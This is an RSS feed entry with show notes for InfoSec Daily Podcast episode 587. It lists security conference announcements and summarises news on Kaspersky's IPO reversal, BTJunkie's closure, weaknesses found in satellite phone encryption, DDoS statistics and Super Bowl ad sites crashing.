	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://news.techworld.com/security/3335337/kaspersky-lab-backs-out-of-ipo-plans"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3335337/kaspersky-lab-backs-out-of-ipo-plans</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky Lab founder Eugene Kaspersky has cancelled plans for the firm to go public, announcing his intention to buy back a 20 percent stake sold to a private equity investor a year ago.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In comments that emerged from the company&rsquo;s Cancun analyst conference, Kaspersky&rsquo;s CEO said the reason for the about turn had to do with his reservations about how an IPO might affect the company&rsquo;s unusual culture.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It is flexible. It is very, very innovative. I like it. I don&#39;t want to change,&quot; the famously laid-back Kaspersky was reported by Reuters to have said. &quot;You don&#39;t have to report to anybody else but yourself.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The news comes only a year after private equity General Atlantic had paid north of a rumoured $200 million in exchange for a 20 percent stake in Kaspersky Lab, which valued the company at the $1 billion mark.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9223989/BTJunkie_voluntarily_closes_file_sharing_website"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223989/BTJunkie_voluntarily_closes_file_sharing_website</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The BitTorrent search engine BTJunkie has shut down its website, the latest file-sharing site to take defensive action following law enforcement&#39;s shutdown of MegaUpload last month.</span><br />
	<a href="http://btjunkie.org/goodbye.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">BTJunkie said</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the move was voluntary. &quot;We&#39;ve been fighting for years for your right to communicate, but it&#39;s time to move on. It&#39;s been an experience of a lifetime, we wish you all the best!&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website, which started in 2005, was ranked by the file-sharing blog</span><a href="http://torrentfreak.com/top-10-most-popular-torrent-sites-of-2011-110105/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> TorrentFreak</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> fifth in a top 10 list of the most popular BitTorrent sites for 2011 based on traffic statistics collected by Alexa and Compete, both Web metrics analysis companies. A &quot;torrent&quot; is a small file that enables files to be shared on a peer-to-peer network using the BitTorrent protocol.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The decision by BTJunkie to shut down is perhaps one of the most drastic steps taken by a file-sharing site to avoid legal trouble. Other popular sites have also implemented changes to lower their profile.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website FileSonic disabled file sharing among users, only allowing members to upload and download their own files. Another sharing site, Uploaded.to, temporarily blocked visitors with IP addresses inside the U.S.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2012/02/03/satellite_phone_hack/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/02/03/satellite_phone_hack/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.hgi.rub.de/hgi/hgi-seminar/aktuelles/#don-t-trust-satellite-phones"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hgi.rub.de/hgi/hgi-seminar/aktuelles/#don-t-trust-satellite-phones</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">German researchers claim they have found weaknesses in two commonly-used satellite encryption protocols that could render them vulnerable to eavesdropping in real time.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the paper titled </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&#39;t Trust Satellite Phones</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (currently available only</span><a href="http://www.hgi.rub.de/hgi/hgi-seminar/aktuelles/#don-t-trust-satellite-phones"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">as an abstract</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), Benedikt Driessen and Ralf Hund of Ruhr University describe how they reverse engineered the GMR-1 and GMR-2 encryption algorithms or stream ciphers used to secure voice traffic on a range of commercial satellite networks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The pair attacked different digital signal processor (DSP) firmware updates for two handsets, Thuraya&rsquo;s GMR-1-based SO-2510, and Inmarsat&rsquo;s GMR-2 IsatPhonePro, extracting the encryption keys used to secure communications in half an hour using a $2,000 setup.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to an interview with the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Daily Telegraph</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the researchers believe a more powerful system could achieve the same results in real time, necessary in most cases for eavesdropping to be useful.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Size-Doesn-t-Matter-Smaller-DDOS-Attacks-May-Be-Deadlier-251024.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Size-Doesn-t-Matter-Smaller-DDOS-Attacks-May-Be-Deadlier-251024.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Contrary to popular beliefs, bigger isn&rsquo;t always necessary better. This is especially true when it comes to distributed denial of service (DDOS) attacks where instead of size, much more significant is the type of attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is just one of the conclusions published by Radware&rsquo;s Emergency Response Team (ERT) after performing a series of tests and polls.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They found that 76% of the DDOS attacks that successfully targeted companies had a bandwidth of less than 1 Gbps. Even so, the damage these hits can cause is far greater than many suspect.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Situations in which companies are brought down by massive DDOS attacks are rare, the numbers revealing that only 9% of the attacks recorded in 2011 were over 10 Gbps, the remaining 32% falling in the under 10 Mbps category.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, practice shows that less intensive, but equally serious attacks have a high potential to bring down an organization if an HTTP flood on the application level is involved, instead of a larger UDP flood on the network.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among the myths Radware busted in their latest report is the one that says firewalls and intrusion prevention systems (IPS) are able to stop DDOS attacks. In reality, firewalls are often the weakest links and the best way to mitigate such attacks is by using dedicated hardware solutions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.<br class="kix-line-break" /><br />
	</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://mashable.com/2012/02/06/coca-cola-acura-websites-crashed-during-super-bowl/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2012/02/06/coca-cola-acura-websites-crashed-during-super-bowl/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The New England Patriots weren&rsquo;t the only ones who choked Sunday night.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Websites from Coca-Cola, Acura and film </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Act of Valor</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> crashed Sunday night after being overwhelmed by Super Bowl ad-driven traffic. In Coke&rsquo;s case, a Facebook app featuring</span><a href="http://mashable.com/2012/01/26/exclusive-coca-cola-polar-bears-will-watch-react-to-super-bowl-in-real-time/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">animated polar bears</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the ads buckled under the strain. On the other hand, Kia&rsquo;s site had the most reliable, fastest performance of all Super Bowl advertisers Sunday night, according to Yottaa, a website optimization firm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yottaa monitored all the Super Bowl advertisers&rsquo; sites Sunday and found those three sites were the only ones that crashed. Coke&rsquo;s site was down long enough for the company to put up a maintenance page. ActofValor.com, meanwhile, experienced at least six outages of five minutes. That site was also five times slower than average during the big game.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meanwhile, Acura&rsquo;s homepage was working, but a call-to-action link wasn&rsquo;t. &ldquo;With an ad spend of $3.5 million plus production costs for 30 seconds of a commercial, leaving visitors with a bad experience is not the way to launch a new car,&rdquo; Bob Buffone, Yottaa co-founder and CTO wrote on</span><a href="http://blog.yottaa.com/2012/02/burstbowl-wrap-up-super-bowl-advertisers-website-performance"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the company&rsquo;s blog</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.<br class="kix-line-break" /><br />
	</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-587-kaspersky-bt-junkie-gmr12-size-doesnt-matter-chokers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3470/0/infosec-daily-podcast-episode-587.mp3" length="20210503" type="audio/mpeg" />
		<itunes:duration>0:42:03</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 587 for February 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Beau Woods.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 587 for February 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Beau Woods.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.techworld.com/security/3335337/kaspersky-lab-backs-out-of-ipo-plans
	Kaspersky Lab founder Eugene Kaspersky has cancelled plans for the firm to go public, announcing his intention to buy back a 20 percent stake sold to a private equity investor a year ago.
	In comments that emerged from the company&#8217;s Cancun analyst conference, Kaspersky&#8217;s CEO said the reason for the about turn had to do with his reservations about how an IPO might affect the company&#8217;s unusual culture.
	&#34;It is flexible. It is very, very innovative. I like it. I don&#39;t want to change,&#34; the famously laid-back Kaspersky was reported by Reuters to have said. &#34;You don&#39;t have to report to anybody else[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 586 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-586-weekend-wrap-up-with-dr-b0n3z</link>
